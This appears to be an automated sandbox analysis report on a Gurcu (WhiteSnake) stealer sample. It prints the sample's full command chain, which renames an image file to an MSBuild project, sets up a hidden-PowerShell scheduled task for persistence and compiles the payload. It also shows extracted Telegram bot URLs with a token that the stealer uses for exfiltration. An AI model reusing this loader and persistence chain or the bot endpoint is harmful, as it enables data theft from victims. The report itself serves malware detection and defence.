gurcu | 3fa93a1a5242d250209451d5775fe454b20b7da8e59b13061353e23e3fefff07

Resubmissions

10-01-2025 12:10

250110-pcbcpatmg1 10

10-01-2025 12:06

250110-n9yc2stmd1 3

Analysis

max time kernel
147s
max time network
149s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
10-01-2025 12:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4c9a58b8a77a5f4c2e4a5ae070c25238aff20810b81e92393ef955f53e6eb5f3.zip
Size

444KB
MD5

9bec57e55df3a59a8e23e898a205d3b4
SHA1

df0fcd66f33e6d82bd650cee765a5d4010fdd728
SHA256

4c9a58b8a77a5f4c2e4a5ae070c25238aff20810b81e92393ef955f53e6eb5f3
SHA512

cc2aa36adbca5c738f9317b30a12849454dfcc719013db5c488191e7a873598a1287ac1261b22b3a12cbcbad5df9303562c8b0f69949d677fee5fdf26755d8d9
SSDEEP

12288:Dzr11rsCDFL2aCI1i4TtDFO7zXylU3J9OOfuJsA3W/:DzH4AFOi/O7zN3OPe/

Score

10^/10

gurcu execution stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7627703707:AAH6TL7Iw6muIVgNjoYcp0OkKmYFg2S1fVE/sendMessag

https://api.telegram.org/bot7627703707:AAH6TL7Iw6muIVgNjoYcp0OkKmYFg2S1fVE/getUpdate

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000\Control Panel\International\Geo\Nation	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
4860	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\taskschd.msc	mmc.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000_Classes\Local Settings	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2676	schtasks.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1284	mspaint.exe
1284	mspaint.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1072	7zFM.exe
564	mmc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1072	7zFM.exe
Token: 35	1072	7zFM.exe
Token: SeSecurityPrivilege	1072	7zFM.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe
Token: SeIncBasePriorityPrivilege	564	mmc.exe
Token: 33	564	mmc.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1072	7zFM.exe
1072	7zFM.exe
564	mmc.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1284	mspaint.exe
1284	mspaint.exe
1284	mspaint.exe
1284	mspaint.exe
564	mmc.exe
564	mmc.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2740 wrote to memory of 932	2740	cmd.exe	110
PID 2740 wrote to memory of 932	2740	cmd.exe	110
PID 932 wrote to memory of 3664	932	cmd.exe	111
PID 932 wrote to memory of 3664	932	cmd.exe	111
PID 932 wrote to memory of 3132	932	cmd.exe	112
PID 932 wrote to memory of 3132	932	cmd.exe	112
PID 932 wrote to memory of 2676	932	cmd.exe	113
PID 932 wrote to memory of 2676	932	cmd.exe	113
PID 932 wrote to memory of 1284	932	cmd.exe	114
PID 932 wrote to memory of 1284	932	cmd.exe	114
PID 388 wrote to memory of 4860	388	cmd.exe	122
PID 388 wrote to memory of 4860	388	cmd.exe	122
PID 4860 wrote to memory of 2460	4860	powershell.exe	123
PID 4860 wrote to memory of 2460	4860	powershell.exe	123
PID 2460 wrote to memory of 4588	2460	MSBuild.exe	124
PID 2460 wrote to memory of 4588	2460	MSBuild.exe	124
PID 4588 wrote to memory of 3200	4588	csc.exe	125
PID 4588 wrote to memory of 3200	4588	csc.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4c9a58b8a77a5f4c2e4a5ae070c25238aff20810b81e92393ef955f53e6eb5f3.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=4204,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
1⤵
PID:5108

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c tar -xf Scan_document.zip|copy logo.png C:\Users\Admin\AppData\Local\Temp\darkmoon.xml &&schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr "C:\Windows\system32\cmd.exe /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A C:\Users\Admin\AppData\Local\Temp\darkmoon.xml" /f &&start ~logo.png
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:932
- - C:\Windows\system32\tar.exe
    tar -xf Scan_document.zip
    3⤵
    PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" copy logo.png C:\Users\Admin\AppData\Local\Temp\darkmoon.xml "
    3⤵
    PID:3132
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr "C:\Windows\system32\cmd.exe /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A C:\Users\Admin\AppData\Local\Temp\darkmoon.xml" /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2676
- - C:\Windows\system32\mspaint.exe
    "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\~logo.png"
    3⤵
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:2644

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=5168,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8
1⤵
PID:4492

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A C:\Users\Admin\AppData\Local\Temp\darkmoon.xml
1⤵
- Suspicious use of WriteProcessMemory
PID:388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A C:\Users\Admin\AppData\Local\Temp\darkmoon.xml
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4860
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" C:\Users\Admin\AppData\Local\Temp\darkmoon.xml
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d0uqroqz\d0uqroqz.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4588
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EAC.tmp" "c:\Users\Admin\AppData\Local\Temp\d0uqroqz\CSC10A0B45F9A29441EA54A4B6F10E26AC.TMP"
        5⤵
        
        PID:3200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CV_Dinh Thi Thuy.pdf.lnk

Filesize
2KB

MD5
df29a780d7b81cc5cffbb67582f77f8c

SHA1
05de1bc87219d163e0b7cbb5a77d17fc31884f11

SHA256
be210a706826056a9284d41ec13070d46a1465ea8eef8b8ae66c548dba7d3fd1

SHA512
1ef8e9f16a4d69cb6d27b3ac333543a0cfcd362acee24af29a0c23fab6ae56e43fd202b7560182c725397c6b4363ec64cff294d4f07f2531f19d24f75b78c416

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5EAC.tmp

Filesize
1KB

MD5
c75b0cd271c836c014c0f16efe00f0f4

SHA1
0a8b6e36df329202fabe4cf54947d3d58124d18b

SHA256
a2a9eaac4ad1c9f431660007a5438a7ff9fc03cadaae77dcab8f069cf0dd2222

SHA512
b047836b8fdb3d5e605658e2abd81065f4fd5c93b0fddd82ba0b63b35f118799e8dc1260b9241949a0677b29e21c9b1a9e453872cc12064c06c879c6b8d811a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iprxqtl2.uxp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\d0uqroqz\d0uqroqz.dll

Filesize
849KB

MD5
b65b83302cbd15596552c1bfa442842f

SHA1
5ea01624345811970996ca0c69580a61949b760d

SHA256
17f7dfb8e1dde845fea95aeeb247efc43b73458b83282ad5726005a04863def8

SHA512
55eda908772368d6215ed77452ef109ec92cdb3f90dd32d49a1de95e86014b988ded72dd48c7bd69c2fdc1a747b8954610c5472bcca637f4dedd2e01dd78733a

Download Submit
C:\Users\Admin\AppData\Local\Temp\d0uqroqz\d0uqroqz.pdb

Filesize
17KB

MD5
b564be2a1e5e58f8c9c8a8cf9a1168a5

SHA1
a71cf29e1d79db0e80ade5787733fda276a2f26f

SHA256
e52a1dd084bc292e2d35655e777055c3cb6d6bf00079c9dd34c87f91046307c4

SHA512
03673a3e8a53eba04904b69c2d3b7fe29459424e3813578f81dee55be64ca89ec37a855d1cb9eaa88fd5ea995f19577484ac4ccd007012ac7f277c0977b62952

Download Submit
C:\Users\Admin\AppData\Local\Temp\logo.png

Filesize
1.6MB

MD5
c129a14d45326d0dc320f615e20873de

SHA1
0e193b8c4cdd0e6e52a9950af0ebdd76b27680fb

SHA256
94227bd384cbc499c7b8c43a2cb67a4e866a9ab0e59b3433271fe3d8a98f809b

SHA512
95bd85c5b5087edcccc2301ce9b4d3b87bc0dfe95611675736152f1865ec2432fdcd27ca2b38f8e188649c737e235f096de367370f3ef6db80e476d5d8822d4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~logo.png

Filesize
3KB

MD5
46eece13c7a9accf878e1189f3e78c02

SHA1
3444e0f96cd3b75e506cc834f846fe25d5555a64

SHA256
de42eaca17215a340275c8c2d8a59e308ba31cf1cdb5d99307d07c7f08a90550

SHA512
e454295fd6e004f4bad8c99a78ada75f8fb8edfe1e603003065e481bd040d792dd636f6d3ea0be3ef2cce1516acf63a8c7680ea12586c4328cde7c6a7668b7e0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d0uqroqz\CSC10A0B45F9A29441EA54A4B6F10E26AC.TMP

Filesize
652B

MD5
dcac55b74e208c149d73ac00c43f6765

SHA1
ef5806a471fcfcfe652ede68cf5008e295cbde2f

SHA256
2b4275fd77eba545b7fca10d02d2a90d1d387d9275e91269489d03f2d70b3d93

SHA512
bd34fbbdd5f8659aad019acbf2654c765b35878bb1fa4e0e0533fd7a347b6437cee5797c636232c2476ea6de085ca75ac92566d79c87604a3fc8db0e622f8834

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d0uqroqz\d0uqroqz.0.cs

Filesize
1.6MB

MD5
1f64d27e217f5f2dcdcccd01ba0060b6

SHA1
66bdfa522ba976017b7477855dbc677e7eeeed8b

SHA256
ea1a981c8dae6f7bcf11b4011c4ae471626ff53d617bbfd3f2da1076e195d10e

SHA512
c729ca0020df602e618582e3fbba98b3b9fded6c44a4cacdb06c5d2948ea799b2f4b0cf7a50771b21f31f333e7dd850a08ec59454f915b7642af7a3847bccb45

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d0uqroqz\d0uqroqz.cmdline

Filesize
1KB

MD5
35970138f324e8b75f1d5cd7f842bde2

SHA1
335bef0635ac084a3bec9b2e8a743841cc3efb4d

SHA256
2650a648644f0bfb58059fdb4e89b79e211abe6e7f40e9351b0a26fd2a4da177

SHA512
f5eff28936827d3b687ade468e86cbc076e13a0c8df38499035b9d29ee0ca15514981bfafe669184619eb180e5f98d89174a2e05856767e032192fc0be258f28

Download Submit
memory/2460-24-0x000001B0F9840000-0x000001B0F985A000-memory.dmp

Filesize
104KB

Download
memory/2460-27-0x000001B0F9D50000-0x000001B0F9E72000-memory.dmp

Filesize
1.1MB

Download
memory/2460-31-0x000001B0F98E0000-0x000001B0F98E8000-memory.dmp

Filesize
32KB

Download
memory/2460-30-0x000001B0FA320000-0x000001B0FA686000-memory.dmp

Filesize
3.4MB

Download
memory/2460-29-0x000001B0F9FB0000-0x000001B0FA12C000-memory.dmp

Filesize
1.5MB

Download
memory/2460-28-0x000001B0F9C70000-0x000001B0F9CB4000-memory.dmp

Filesize
272KB

Download
memory/2460-33-0x000001B0F99A0000-0x000001B0F99B2000-memory.dmp

Filesize
72KB

Download
memory/2460-32-0x000001B0F98E0000-0x000001B0F98E8000-memory.dmp

Filesize
32KB

Download
memory/2460-26-0x000001B0F9910000-0x000001B0F9940000-memory.dmp

Filesize
192KB

Download
memory/2460-25-0x000001B0F99C0000-0x000001B0F9B1A000-memory.dmp

Filesize
1.4MB

Download
memory/2460-23-0x000001B0DF4B0000-0x000001B0DF4EE000-memory.dmp

Filesize
248KB

Download
memory/2460-60-0x000001B0F9C40000-0x000001B0F9C60000-memory.dmp

Filesize
128KB

Download
memory/2460-48-0x000001B0F9CC0000-0x000001B0F9D9A000-memory.dmp

Filesize
872KB

Download
memory/2460-54-0x000001B0F9DA0000-0x000001B0F9E2E000-memory.dmp

Filesize
568KB

Download
memory/4860-11-0x000001B7119A0000-0x000001B7119C2000-memory.dmp

Filesize
136KB

Download